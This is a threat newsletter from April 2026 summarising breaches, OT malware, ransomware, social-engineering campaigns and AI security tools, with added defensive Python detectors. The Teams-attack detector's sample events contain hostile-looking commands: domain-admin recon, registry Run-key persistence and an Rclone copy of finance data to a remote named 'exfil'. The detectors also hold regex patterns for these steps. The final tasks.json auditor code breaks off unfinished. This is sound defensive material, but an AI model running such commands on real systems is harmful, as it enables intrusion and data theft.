Threat Newsletter April 27, 2026


This week’s threat intel highlights a wave of account-takeover and social-engineering intrusions, escalating ransomware and OT/ICS risks, and continued DDoS and perimeter-device exploitation—reinforcing the need to harden identity controls, rotate secrets, patch fast, and tightly segment and monitor critical infrastructure.


Vercel Confirms Security Breach After Hackers Claim Stolen Data for Sale

Vercel confirmed a security incident involving unauthorized access to some internal Vercel systems, and said a limited subset of customers was affected.

Key Takeaways

Confirmed breach: Vercel acknowledged unauthorized access to internal systems; limited customer impact.

Entry point: Third-party OAuth/Google Workspace compromise led to employee account takeover.

What enabled expansion: Exposure of environment variables marked “non-sensitive” (not encrypted at rest) helped the attacker enumerate and escalate.

Operational impact: No service outage reported.

Attacker claims: A threat actor claimed stolen data/keys for sale, but details/attribution are not fully verified.

Action for defenders/customers: Review and rotate secrets, and ensure sensitive environment variables are properly marked/encrypted.
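As an added illustration of the "review and rotate secrets" action (this is not Vercel's code or guidance), the Python audit below flags environment variables whose values look like credentials but are not marked sensitive. The inventory shape (name, value, sensitive-flag tuples), the name and prefix heuristics, the entropy threshold and every sample value are assumptions constructed for this example.

```python
"""Audit an environment-variable inventory for secret-looking values that were
left non-sensitive. Added example, not Vercel's code; the tuple shape, the
heuristics and the sample values are assumptions for illustration."""
import math
import re
from collections import Counter

# Name fragments that almost always denote a credential.
SECRET_NAME_HINTS = ("SECRET", "TOKEN", "PASSWORD", "PASSWD", "PRIVATE_KEY",
                     "API_KEY", "SIGNING_KEY", "CREDENTIAL")
# Prefixes that credential issuers stamp on keys (illustrative subset).
SECRET_VALUE_PREFIXES = ("sk_live_", "sk_test_", "ghp_", "AKIA", "xoxb-", "-----BEGIN")
# user:password@ embedded in a connection URL.
URL_CREDENTIAL = re.compile(r"://[^/\s:@]+:[^/\s@]+@")
ENTROPY_MIN_LEN, ENTROPY_THRESHOLD = 24, 4.0   # assumed tuning for the example


def shannon_entropy(s: str) -> float:
    """Bits per character; a random 32-character key scores close to 5."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_secret(name: str, value: str) -> list:
    """Return the reasons a variable looks like a credential ([] if none)."""
    reasons = []
    if any(h in name.upper() for h in SECRET_NAME_HINTS):
        reasons.append("name hints at a credential")
    if value.startswith(SECRET_VALUE_PREFIXES):
        reasons.append("value carries a known credential prefix")
    if URL_CREDENTIAL.search(value):
        reasons.append("connection URL embeds a username and password")
    # Long single-token values with high entropy are typical of random keys;
    # URLs and English words stay well under the threshold.
    if len(value) >= ENTROPY_MIN_LEN and " " not in value:
        ent = shannon_entropy(value)
        if ent >= ENTROPY_THRESHOLD:
            reasons.append(f"high-entropy value ({ent:.2f} bits/char)")
    return reasons


def audit(env_vars) -> list:
    """(name, reasons) for every secret-looking variable not marked sensitive."""
    findings = []
    for name, value, sensitive in env_vars:
        reasons = looks_like_secret(name, value)
        if reasons and not sensitive:
            findings.append((name, reasons))
    return findings


# Constructed inventory: (name, value, marked_sensitive).
SAMPLE_ENV = [
    ("NEXT_PUBLIC_API_URL", "https://api.example.test/v1", False),
    ("NODE_ENV", "production", False),
    ("STRIPE_SECRET_KEY", "sk_live_EXAMPLEkey0123456789abcdef", False),      # never marked
    ("DATABASE_URL", "postgres://app:Kq8vXw2pT9@db.internal:5432/app", False),  # creds in URL
    ("CACHE_SIGNING", "Zx9qL0mBv2cR7nWa4eY8pS3tD6fG1hJ5", False),               # name gives no hint
    ("SESSION_SIGNING_KEY", "a-value-already-marked-sensitive", True),          # correctly marked
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_ENV):
        print(f"{name}: {'; '.join(reasons)}")
```

Run on the sample inventory it reports STRIPE_SECRET_KEY, DATABASE_URL and CACHE_SIGNING; the last one is caught only by the entropy rule, which is why a name-based check alone is not enough. Anything it reports is a rotation candidate, not just a relabelling candidate, since a value stored unencrypted may already have been read.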

Vercel confirms breach as hackers claim to be selling stolen data
Cloud development platform Vercel has disclosed a security incident after threat actors claimed to have breached its systems and are attempting to sell stolen data.

New “ZionSiphon” OT Malware Aims at Water Infrastructure

ZionSiphon is a newly analyzed malware sample built to bridge traditional IT infection with OT/ICS-aware behaviors, with logic that strongly suggests it’s meant for water treatment/desalination environments.

Key Takeaways

Target: Water sector OT/ICS (desalination, wastewater, water treatment).

Core behavior: Mixes normal malware tradecraft (priv-esc, persistence) with ICS discovery + process-manipulation intent.

OT capabilities: Scans local networks for ICS devices and probes Modbus/DNP3/S7comm (Modbus looks most developed).

Potential impact: Attempts to tamper with chlorine dosing and pressure values—could disrupt treatment processes if successfully applied.

Propagation: Includes USB/removable media spread techniques.

Maturity: Likely under development (incomplete protocol code + execution logic issues); may fail to detonate and self-delete.

Why it matters: Even if this sample is buggy, it signals continued adversary interest in directly manipulating physical/industrial processes, not just stealing data.
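Because the sample's Modbus logic is described as the most developed and the feared outcome is a changed dosing or pressure value, the monitoring check a water utility would want is "who is writing to which registers". The Python below is an added example, not code from the ZionSiphon analysis: it parses Modbus/TCP frames, decodes the write function codes, and alerts on writes from anything other than an allowlisted SCADA/HMI host, with extra detail when a protected setpoint register is touched. The register map, the authorized-writer address and the captured frames are constructed for illustration.

```python
"""Alert on Modbus/TCP writes from unauthorized sources, especially to
process setpoints. Added example, not from the ZionSiphon analysis; the
register map, the allowlist and the sample frames are constructed."""
import struct

WRITE_FUNCTION_CODES = {
    5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
    23: "Read/Write Multiple Registers",
}
# Constructed plant register map: holding registers an operator would protect.
PROTECTED_REGISTERS = {100: "chlorine dosing setpoint", 101: "discharge pressure setpoint"}
# Constructed allowlist: only the SCADA/HMI server may issue writes.
AUTHORIZED_WRITERS = {"10.20.0.5"}


def parse_modbus_tcp(frame: bytes):
    """Parse one Modbus/TCP ADU (7-byte MBAP header + PDU); None if malformed.
    Target address and values are decoded for function codes 5, 6 and 16."""
    if len(frame) < 8:
        return None
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    # Protocol id is always 0; length counts unit id + PDU bytes.
    if pid != 0 or length != len(frame) - 6:
        return None
    fc = frame[7]
    pdu = frame[8:]
    info = {"transaction": tid, "unit": unit, "function": fc,
            "is_write": fc in WRITE_FUNCTION_CODES, "address": None, "values": []}
    if fc in (5, 6):                       # address(2) + value(2)
        if len(pdu) < 4:
            return None
        info["address"], value = struct.unpack(">HH", pdu[:4])
        info["values"] = [value]
    elif fc == 16:                         # address(2) + qty(2) + bytecount(1) + values
        if len(pdu) < 5:
            return None
        addr, qty, nbytes = struct.unpack(">HHB", pdu[:5])
        if nbytes != 2 * qty or len(pdu) < 5 + nbytes:
            return None
        info["address"] = addr
        info["values"] = list(struct.unpack(f">{qty}H", pdu[5:5 + nbytes]))
    return info


def check_write(src_ip: str, frame: bytes) -> list:
    """Alert strings for a suspicious frame; [] for reads or authorized writes."""
    info = parse_modbus_tcp(frame)
    if info is None:
        return ["malformed or non-Modbus frame"]
    if not info["is_write"] or src_ip in AUTHORIZED_WRITERS:
        return []
    fc = info["function"]
    alerts = [f"unauthorized Modbus write from {src_ip} to unit {info['unit']}: "
              f"{WRITE_FUNCTION_CODES[fc]} (FC {fc}) at address {info['address']}"]
    if info["address"] is not None:
        for offset, value in enumerate(info["values"]):
            reg = info["address"] + offset
            if reg in PROTECTED_REGISTERS:
                alerts.append(f"protected register {reg} ({PROTECTED_REGISTERS[reg]}) set to {value}")
    return alerts


# Constructed captures (unit 1; hex with spaces is accepted by bytes.fromhex).
FRAME_HMI_SETPOINT = bytes.fromhex("0001 0000 0006 01 06 0064 015e")               # FC6: reg 100 := 350
FRAME_ROGUE_MULTI_WRITE = bytes.fromhex("0002 0000 000b 01 10 0064 0002 04 0384 0014")  # FC16: regs 100..101
FRAME_ROGUE_READ = bytes.fromhex("0003 0000 0006 01 03 0064 0002")                 # FC3: read 2 regs

if __name__ == "__main__":
    for src, frame in [("10.20.0.5", FRAME_HMI_SETPOINT),
                       ("10.20.7.77", FRAME_ROGUE_MULTI_WRITE),
                       ("10.20.7.77", FRAME_ROGUE_READ)]:
        print(src, check_write(src, frame) or "ok")
```

The same setpoint write from the HMI is silent while the multi-register write from a workstation produces three alerts, one for the write and one per protected register. A network tap or span port feeding this logic sits in the monitoring path only, so it cannot block a write; pairing it with PLC-side write protection and segmentation is what actually prevents a dosing change.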

ZionSiphon Malware Targets Water Infrastructure Systems
ZionSiphon malware targets OT water systems with sabotage and ICS scanning capabilities

Bluesky Blames Platform Outage on “Sophisticated” DDoS Attack

Bluesky said a widespread outage on its social platform was caused by a “sophisticated” DDoS attack that disrupted multiple core features.

Key Takeaways

Cause: Bluesky blames the outage on a DDoS attack (availability disruption, not a confirmed breach).

Impact: Multiple features were affected (feeds, notifications, threads, search).

Timeline: Began Apr 15; stabilized by Apr 16 while attacks continued.

Data risk: Bluesky said no evidence of private user data access.

Attribution: No confirmed attribution from Bluesky; 313 Team claimed responsibility and said it targeted the API.

Bluesky blames app outage on ‘sophisticated’ DDoS attack
The decentralized social network said the incident began on April 15, when the company received reports of intermittent outages affecting the app.

Scattered Spider Member Pleads Guilty in U.S. Crypto Theft Case

A British man alleged to be a leader in the Scattered Spider cybercrime collective pleaded guilty in the U.S. to wire fraud and aggravated identity theft.

Key Takeaways

What happened: Alleged Scattered Spider leader pleaded guilty (wire fraud + aggravated identity theft).

Impact: Scheme tied to $8M+ in crypto theft and dozens of victims (companies + individuals).

How they did it: SMS phishing → credential theft/PII → SIM swapping → wallet takeover/transfers.

Why it matters: Reinforces Scattered Spider’s core playbook: social engineering + identity/telecom abuse, not “zero-days.”

Defender actions: Harden against smishing, lock down helpdesk/identity verification, enforce phishing-resistant MFA (FIDO2/WebAuthn), add SIM-swap/number-port protections, and monitor for MFA fatigue + account takeover signals.
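The "MFA fatigue" signal in the last takeaway is easy to describe and easy to miss in raw logs, so here is an added Python detector (not from the case reporting or any vendor) that flags a user who rejected or ignored several push prompts within a short window and then approved one. The JSON event shape, the window and burst thresholds, and the sample lines are all constructed assumptions for this example.

```python
"""Flag MFA push-bombing: several rejected or unanswered push prompts for one
user inside a short window, followed by an approval. Added example; the event
shape, thresholds and sample lines are constructed, not from any product."""
import json
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # how far back earlier prompts are counted
PROMPT_BURST = 3                 # rejected/unanswered prompts that make an approval suspicious
REJECTED = {"DENY", "TIMEOUT"}   # TIMEOUT = prompt the user never answered


def detect_mfa_fatigue(lines) -> list:
    """Return one alert per suspicious approval found in the JSON-lines input."""
    events = sorted((json.loads(line) for line in lines), key=lambda e: e["ts"])
    recent = {}      # user -> [(ts, result, ip), ...] kept inside WINDOW
    alerts = []
    for ev in events:
        if ev["event"] != "mfa.push":
            continue
        ts = datetime.fromisoformat(ev["ts"])
        hist = recent.setdefault(ev["user"], [])
        hist[:] = [h for h in hist if ts - h[0] <= WINDOW]   # drop prompts outside the window
        if ev["result"] == "APPROVE":
            rejected = [h for h in hist if h[1] in REJECTED]
            if len(rejected) >= PROMPT_BURST:
                alerts.append({
                    "user": ev["user"],
                    "approved_at": ev["ts"],
                    "rejected_prompts": len(rejected),
                    "first_prompt_at": rejected[0][0].isoformat(),
                    "prompt_ips": sorted({h[2] for h in rejected}),
                })
        hist.append((ts, ev["result"], ev["ip"]))
    return alerts


# Constructed identity-provider log: alice is push-bombed and gives in,
# bob mistypes once, carol's three denials are too spread out to matter.
SAMPLE_LOG = [
    '{"ts":"2026-04-20T08:01:10","user":"alice","event":"mfa.push","result":"DENY","ip":"198.51.100.23"}',
    '{"ts":"2026-04-20T08:01:40","user":"alice","event":"mfa.push","result":"TIMEOUT","ip":"198.51.100.23"}',
    '{"ts":"2026-04-20T08:02:05","user":"alice","event":"mfa.push","result":"DENY","ip":"198.51.100.23"}',
    '{"ts":"2026-04-20T08:02:30","user":"bob","event":"login.password","result":"SUCCESS","ip":"203.0.113.9"}',
    '{"ts":"2026-04-20T08:03:00","user":"bob","event":"mfa.push","result":"DENY","ip":"203.0.113.9"}',
    '{"ts":"2026-04-20T08:03:20","user":"bob","event":"mfa.push","result":"APPROVE","ip":"203.0.113.9"}',
    '{"ts":"2026-04-20T08:06:45","user":"alice","event":"mfa.push","result":"APPROVE","ip":"198.51.100.23"}',
    '{"ts":"2026-04-20T08:00:00","user":"carol","event":"mfa.push","result":"DENY","ip":"192.0.2.77"}',
    '{"ts":"2026-04-20T08:15:00","user":"carol","event":"mfa.push","result":"DENY","ip":"192.0.2.77"}',
    '{"ts":"2026-04-20T08:30:00","user":"carol","event":"mfa.push","result":"DENY","ip":"192.0.2.77"}',
    '{"ts":"2026-04-20T08:35:00","user":"carol","event":"mfa.push","result":"APPROVE","ip":"192.0.2.77"}',
]

if __name__ == "__main__":
    for alert in detect_mfa_fatigue(SAMPLE_LOG):
        print(alert)
```

Only alice is reported. The alert carries the IPs that generated the prompts so an analyst can compare them with the user's usual locations; a number-matching or FIDO2/WebAuthn factor, as the takeaway recommends, removes the "just tap approve" step this detection is watching for.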

British Scattered Spider hacker pleads guilty to crypto theft charges
A British man, believed to be the leader of the Scattered Spider cybercrime collective, has pleaded guilty in the United States to charges of wire fraud and aggravated identity theft.

Serial-to-IP Converter Flaws Expose OT and Healthcare Systems to Remote Attacks

Researchers uncovered several serious flaws in Serial-to-IP converters (also called serial device servers). Since these boxes connect legacy serial and ICS gear to Ethernet networks, an attacker who compromises one remotely could use it as a foothold into OT and healthcare environments.

Key Takeaways

What’s affected: Serial-to-IP converters / serial device servers used across OT and healthcare (and many other sectors).

Why it matters: These devices often sit in “in-between” network zones and can become an easy bridge into critical systems if exposed or reachable internally.

Potential attacker outcomes: RCE/command injection, device takeover, file upload, auth bypass, firmware tampering, DoS.

Real-world impact examples: Attackers could manipulate sensor data (hiding dangerous conditions) or brick/disrupt devices in healthcare workflows (lost connectivity for monitors/telemetry, lab backlogs, etc.).

Status/mitigation: Patch available (Lantronix/Silex advisories; CISA advisory for Lantronix). Prioritize: patching, remove internet exposure, restrict management access, and segment/monitor these bridge devices like critical OT assets.

BRIDGE:BREAK reveals 22 vulnerabilities in serial-to-IP converters enabling disruption and lateral movement across OT - Industrial Cyber
BRIDGE:BREAK reveals 22 vulnerabilities in serial-to-IP converters enabling disruption and lateral movement across OT environments.

Ransomware Disruption in London NHS Continues, With Backlogs and Safety Incidents

A June 2024 ransomware attack by the Qilin ransomware group continues to reverberate. Internal documents show at least one NHS trust is still working without fully restored systems and managing large backlogs of delayed test results, restricted blood supplies, the theft and publication of sensitive patient data, and delayed treatment of highly time-sensitive conditions such as cancer.

Key Takeaways

Incident: June 2024 ransomware attack on Synnovis disrupted blood testing and care across South East London.

Long-tail impact: 18+ months later, at least one NHS trust is still not fully restored and is operating with business-continuity workarounds (paper/PDF + manual uploads).

Patient-safety risk: Delays can mean test results aren’t available when needed; workarounds introduce risk of delays, transcription errors, and patient misidentification.

Scale of disruption (reported): Thousands of outpatient appointments and elective procedures were postponed; significant backlogs of pathology reporting persisted in some areas.

Data exposure: Attack involved theft/publication of sensitive patient data; reporting suggests up to ~1M patients may have been impacted, with notifications delayed for many.

Threat actor: Attack attributed in reporting to the Qilin ransomware group.

Ransomware attack continues to disrupt healthcare in London nearly two years later
More than 18 months after a ransomware attack disrupted care at hospitals in South East London, documents show at least one NHS trust is still working without fully restored systems and managing large backlogs of delayed test results.

Global Crackdown Disrupts DDoS-for-Hire Services; Four Arrested

A coordinated international law-enforcement operation (Operation PowerOFF) disrupted multiple DDoS-for-hire services that sell cheap, on-demand DDoS attacks.

Key Takeaways

What happened: Multi-country PowerOFF action targeted DDoS-for-hire platforms.

Enforcement results: 4 arrests, 25 search warrants, and 50+ domains seized (per Europol).

Scale: Authorities said they identified roughly 75,000 users of the services.

US action: DOJ seized eight sites (including Vac Stresser and Mythical Stress) and searched backend servers.

Why it matters: “Stresser” sites provide a low barrier to entry for disruption/extortion—making DDoS accessible to non-technical actors.

Four arrested in latest ‘PowerOFF’ DDoS-for-hire takedown
More than 20 countries participated in a coordinated takedown of platforms selling cheap access to distributed denial-of-service (DDoS) attacks.

RedSun: Microsoft Defender Flaw Lets Attackers Gain SYSTEM Privileges

A security researcher released a proof-of-concept exploit for a new Microsoft Defender local privilege escalation (LPE) zero-day dubbed “RedSun.”

Key Takeaways

What it is: A Microsoft Defender LPE zero-day PoC (“RedSun”) that can grant SYSTEM privileges.

Who’s affected: Windows 10, Windows 11, and Windows Server systems that are fully patched (April 2026) with Defender enabled.

Attack type: Local privilege escalation — attacker generally needs code execution on the host already, then uses this to become SYSTEM.

How it works (high level): Abuses Defender behavior around cloud-tagged detection / file rewrite to enable system file overwrite → SYSTEM execution.

Validation: Another analyst (Will Dormann) reported it works on fully patched systems.

Why it matters: Converts a foothold (standard user) into full machine takeover; increases risk/severity of phishing/malware that lands initial access.

New Microsoft Defender “RedSun” zero-day PoC grants SYSTEM privileges
A researcher known as “Chaotic Eclipse” has published a proof-of-concept exploit for a second Microsoft Defender zero-day, dubbed “RedSun,” in the past two weeks, protesting how the company works with cybersecurity researchers.

Mirai Variant “Nexcorium” Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS

Nexcorium is a Mirai-based botnet variant that’s being used to compromise TBK DVR (digital video recorder) devices by exploiting CVE-2024-3721.

Key Takeaways

What it is: Nexcorium, a Mirai variant (IoT botnet malware).

Initial access: Exploits CVE-2024-3721 to compromise TBK DVRs.

Goal/impact: Turns infected DVRs into botnet nodes used for DDoS attacks.

Why it matters: IoT devices like DVRs often stay unpatched and internet-exposed, making them high-leverage DDoS infrastructure.

Defender actions: Identify TBK DVR exposure, patch/mitigate CVE-2024-3721, remove direct internet access, restrict management interfaces, and monitor for unusual outbound traffic typical of botnet activity.

Hackers Exploit CVE-2024-3721 To Deploy Nexcorium Malware On TBK DVRs
Internet of Things (IoT) devices remain highly vulnerable targets for cyberattacks due to poor security configurations and delayed patching.

CISA Reportedly Left Out as Anthropic Shares “Mythos” With 40+ Organizations

CISA, the U.S. agency many critical-infrastructure teams rely on for shared cybersecurity guidance, reportedly does not currently have access to Anthropic’s new AI security tool, “Mythos,” even as Anthropic has provided it to 40+ organizations for testing.

Key Takeaways

Main point: CISA isn’t on the list of organizations currently getting access to Anthropic’s Mythos.

Access elsewhere: Mythos has reportedly been shared with 40+ organizations, and parts of the U.S. government ecosystem (e.g., Commerce and NSA) are cited as having access/testing.

Why it matters: CISA is a key “hub” for sharing threat intel and prioritization guidance across critical infrastructure; lack of access could slow or limit broad sector-wide benefit.

What to watch: Whether Mythos insights end up being distributed via other agencies (Commerce/NSA) and how that affects speed, transparency, and consistency of guidance to industry.

Anthropic’s Mythos rollout has missed America’s cybersecurity agency
Other agencies have reportedly gotten Mythos — but not CISA.

Threat Actors Pose as Helpdesk in External Teams Chats to Gain Remote Control

Threat actors are increasingly using external Microsoft Teams chats to impersonate an organization’s IT/helpdesk and socially engineer employees into granting remote access.


Key Takeaways

Initial lure: External Teams message pretending to be helpdesk/IT (“account issue” / “security update”).

Initial access method: Victim is tricked into starting a Quick Assist (or similar) remote support session.

Living-off-the-land: Attack chain uses legit tools + native admin protocols, making detection harder.

Post-compromise actions: Recon via PowerShell/CMD, persistence via registry changes, lateral movement via WinRM, then deploy more tooling.

Data theft: The threat actors use Rclone to exfiltrate data to external cloud storage; exfiltration is often targeted to reduce noise.

Defensive focus: Treat external Teams chats as untrusted, restrict/monitor remote assistance tools, and tightly control/monitor WinRM and other lateral-movement pathways.
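The stages in the takeaways above (remote-assistance session, recon, registry persistence, WinRM lateral movement, Rclone exfiltration) are individually noisy but together form a distinctive chain. The Python below is an added example, not Microsoft's detection logic: it classifies process-creation events into those stages and alerts when a Quick Assist launch on a host is followed, within a window, by at least two of the other stages. The Sysmon-like event shape, the regexes, the window and every sample event are constructed assumptions.

```python
"""Correlate a Quick Assist session with follow-on living-off-the-land
activity on the same host. Added example, not Microsoft's detection logic;
the event shape, rules, window and sample events are constructed."""
import re
from datetime import datetime, timedelta

CHAIN_WINDOW = timedelta(hours=2)   # how long after Quick Assist to correlate
MIN_FOLLOW_ON_STAGES = 2            # stages beyond Quick Assist required to alert

RECON = re.compile(r"\b(whoami|systeminfo|nltest|ipconfig|net (?:user|group|localgroup|view))\b")
WINRM_CLIENT = re.compile(r"\b(enter-pssession|invoke-command)\b.*-computername")
RCLONE = re.compile(r"\brclone\b.*\b(copy|sync|move)\b")


def classify(ev: dict):
    """Map one process-creation event to a chain stage, or None if uninteresting."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"].lower()
    if image == "quickassist.exe":
        return "quick_assist"
    if image in ("powershell.exe", "pwsh.exe", "cmd.exe") and RECON.search(cmd):
        return "recon"
    if image == "reg.exe" and "currentversion\\run" in cmd:      # Run-key persistence
        return "persistence"
    if image == "wsmprovhost.exe" or WINRM_CLIENT.search(cmd):  # WinRM host-side or client-side
        return "lateral_winrm"
    if image == "rclone.exe" or RCLONE.search(cmd):
        return "exfil_rclone"
    return None


def detect_helpdesk_chain(events) -> list:
    """One alert per host whose Quick Assist session is followed by enough stages."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        anchor, stages, user = None, {}, None
        for ev in evs:
            stage = classify(ev)
            if stage is None:
                continue
            ts = datetime.fromisoformat(ev["ts"])
            if stage == "quick_assist":            # a new session restarts the chain
                anchor, stages, user = ts, {"quick_assist": ts}, ev["user"]
            elif anchor is not None and ts - anchor <= CHAIN_WINDOW:
                stages.setdefault(stage, ts)        # keep first sighting of each stage
        if anchor is not None and len(stages) - 1 >= MIN_FOLLOW_ON_STAGES:
            alerts.append({"host": host, "user": user,
                           "quick_assist_at": anchor.isoformat(), "stages": list(stages)})
    return alerts


# Constructed events: one full chain, one benign support session, one backup job.
SAMPLE_EVENTS = [
    {"ts": "2026-04-21T13:02:11", "host": "WS-FINANCE-07", "user": "jdoe",
     "image": "C:\\Windows\\System32\\quickassist.exe", "cmdline": "quickassist.exe"},
    {"ts": "2026-04-21T13:09:40", "host": "WS-FINANCE-07", "user": "jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -c \"whoami /all; net group 'Domain Admins' /domain\""},
    {"ts": "2026-04-21T13:15:02", "host": "WS-FINANCE-07", "user": "jdoe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\u.exe"},
    {"ts": "2026-04-21T13:41:27", "host": "WS-FINANCE-07", "user": "jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Invoke-Command -ComputerName FS01 -ScriptBlock { Get-ChildItem C:\\Shares }"},
    {"ts": "2026-04-21T14:20:55", "host": "WS-FINANCE-07", "user": "jdoe",
     "image": "C:\\Users\\Public\\rclone.exe", "cmdline": "rclone.exe copy C:\\Finance remote:exfil --transfers 4"},
    {"ts": "2026-04-21T10:30:00", "host": "WS-HR-02", "user": "asmith",
     "image": "C:\\Windows\\System32\\quickassist.exe", "cmdline": "quickassist.exe"},
    {"ts": "2026-04-21T10:35:00", "host": "WS-HR-02", "user": "asmith",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
    {"ts": "2026-04-21T02:00:00", "host": "SRV-BUILD-01", "user": "svc_backup",
     "image": "C:\\Tools\\rclone.exe", "cmdline": "rclone.exe sync D:\\Artifacts backup:nightly"},
]

if __name__ == "__main__":
    for alert in detect_helpdesk_chain(SAMPLE_EVENTS):
        print(alert)
```

Only WS-FINANCE-07 is reported, with all five stages in order. The HR session with no follow-on activity and the scheduled Rclone backup on the build server stay silent, which is the point of correlating on the Quick Assist anchor rather than alerting on any one legitimate tool by itself.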

Microsoft: Teams increasingly abused in helpdesk impersonation attacks
Microsoft is warning of threat actors increasingly abusing external Microsoft Teams collaboration and relying on legitimate tools for access and lateral movement on enterprise networks.

Insider Betrayal: Ransomware Negotiator Shared Victim Insurance Limits With BlackCat

A former ransomware negotiator at an incident response firm pleaded guilty to participating in BlackCat (ALPHV) ransomware/extortion activity.

Key Takeaways

Who/what: Former DigitalMint employee Angelo Martino pleaded guilty for involvement in BlackCat (ALPHV) attacks.

Breach of trust: As a negotiator, allegedly leaked victim negotiation info + insurance limits to the ransomware crew.

Co-conspirators: Two other negotiators (Sygnia/DigitalMint) also pleaded guilty and face significant prison time.

Impact: Multiple U.S. organizations targeted; reported ransoms include $25.66M (financial services) and $26.793M (nonprofit).

Why it matters: Highlights an insider-risk angle in the ransomware ecosystem—attackers can exploit “trusted” third parties involved in response/negotiation.

Defender takeaway: Treat IR/negotiation engagements as high-trust/high-risk: enforce least privilege, strict information-sharing controls, logging, and separation of duties for anyone with access to victim financial/insurance/negotiation details.

Former ransomware negotiator pleads guilty to BlackCat attacks
41-year-old Angelo Martino, a former employee of cybersecurity incident response company DigitalMint, has pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.

Backdoor Allegations Resurface: Iran Points to Western Network Vendors After Disruptions

Iranian media claims the U.S. used a backdoor and/or a botnet to remotely disrupt networking equipment inside Iran during the current conflict, causing devices from major vendors to reboot or disconnect even though Iran had largely cut itself off from the global internet.

Key Takeaways

Claim (unverified): Iran alleges the U.S. remotely disrupted network devices via firmware/bootloader backdoors or botnet-style access.

Vendors mentioned: Iranian reports point to equipment from Cisco, Juniper, Fortinet, and MikroTik.

Why it’s hard to confirm: Iran’s internet has been heavily restricted/blocked, making independent validation of widespread outages difficult.

Narrative impact: China is using the story to bolster propaganda that the U.S. is the main cyber aggressor and that “backdoor” accusations against China are deflection.

Defender lens: Regardless of attribution, this underscores the strategic risk of network-device compromise (firmware integrity, supply-chain trust, and segmentation/monitoring of critical network infrastructure).

Iran claims US used backdoors in networking equipment
And China is loving it

OpenAI Expands Government Access to GPT-5.4-Cyber With Tiered Vetting and Safeguards

OpenAI has been briefing U.S. federal agencies, state governments, and Five Eyes partners on a new cybersecurity-focused model/product (described as GPT-5.4-Cyber) that’s being rolled out under a tiered, vetted access program.

Key Takeaways

What happened: OpenAI demoed/briefed government cyber defenders on GPT-5.4-Cyber and is extending briefings to Five Eyes partners.

Access model: Vetted, tiered access (Trusted Access for Cyber) — government applicants go through similar vetting as commercial customers.

Why it matters: These tools can meaningfully accelerate defensive work (finding and prioritizing exploitable flaws), but also raise concerns about offensive misuse if access controls fail.

Strategic angle: OpenAI is aiming to build channels for threat intel sharing and prioritize key government/critical-infrastructure use cases.

Context: Rollout is happening alongside Anthropic’s Mythos approach (more restricted preview), highlighting a broader push to balance capability vs. controlled distribution.

OpenAI’s New GPT-5.4-Cyber Raises The Stakes For AI And Security
Described by OpenAI as a new model tuned for defensive cybersecurity tasks, GPT-5.4-Cyber is being offered first to vetted security researchers, vendors and organizations.

Mozilla Leans on AI Bug-Finding to Harden Firefox Ahead of Attacker Use

Mozilla said it used early access to Anthropic’s Mythos Preview (an AI security tool) to help identify 271 vulnerabilities that were then addressed in the Firefox 150 release.

Key Takeaways

Outcome: Firefox 150 includes fixes/protections for 271 bugs found with Mythos Preview.

Signal: AI-assisted security testing is meaningfully increasing bug discovery volume and speed.

Operational reality: More findings mean more triage + engineering lift to turn detections into real fixes.

Why it matters: Defensive teams are racing to use these tools first, since attackers will get comparable capability over time.

Big picture: AI is shifting vulnerability discovery toward “who can process the most findings fastest,” not just who can find bugs at all.

Mozilla Used Anthropic’s Mythos to Find and Fix 271 Bugs in Firefox
The Firefox team doesn’t think emerging AI capabilities will upend cybersecurity long term, but they warn that software developers are likely in for a rocky transition.

From Fake Interviews to Supply Chain Risk: DPRK Campaign Self-Propagates Through Developer Tools

North Korean threat actors are evolving the long-running “fake job interview” lure into something that can self-propagate through the developer ecosystem.

Key Takeaways

Threat: DPRK “Contagious Interview” fake recruiter/job scams targeting software developers.

What changed: It’s no longer just one-off social engineering — infected repos can spread to other repos (worm-like supply chain behavior).

Initial access: Victims are asked to clone/run a repo during a fake interview “coding test.”

Execution trick: Abuse of VS Code workspace tasks—if the victim accepts the workspace trust prompt, tasks can execute and drop malware.

Payload/impact: RATs + credential/secret theft (crypto wallet creds, signing keys, CI/CD and production access), enabling broader org compromise.

Defender takeaways: Treat interview code as untrusted; run in an isolated VM/container with no tokens/secrets, enforce dependency hygiene (lockfiles/integrity checks), and ensure endpoint protection + VS Code Workspace Trust policies are in place.

Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories
Our research on Void Dokkaebi’s operations uncovered a campaign that turns infected developer repositories into malware delivery channels. By spreading through trusted workflows, organizational codebases, and open-source projects, the threat can scale from a single compromise to a broader supply chain risk.
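
The workspace-task trick above is easy to check for before a repo is ever opened in VS Code. The following is an added example (not code from the Void Dokkaebi report or from VS Code) that parses a repo's .vscode/tasks.json and flags tasks declared with the documented "runOptions": {"runOn": "folderOpen"} setting; the sample JSON is constructed.

```python
"""Audit a cloned repo's .vscode/tasks.json for tasks that auto-run when the folder opens.
Added example, not code from the Void Dokkaebi report. Assumes the standard VS Code tasks.json
schema, where "runOptions": {"runOn": "folderOpen"} starts a task as soon as a trusted
workspace opens. The sample JSON at the bottom is constructed."""
import json
import re
from pathlib import Path

# VS Code accepts comments and trailing commas in tasks.json. Only full-line // comments
# are stripped so that "//" inside a URL string survives.
_COMMENT_RE = re.compile(r"^[ \t]*//[^\n]*|/\*.*?\*/", re.MULTILINE | re.DOTALL)
_TRAILING_COMMA_RE = re.compile(r",\s*([}\]])")
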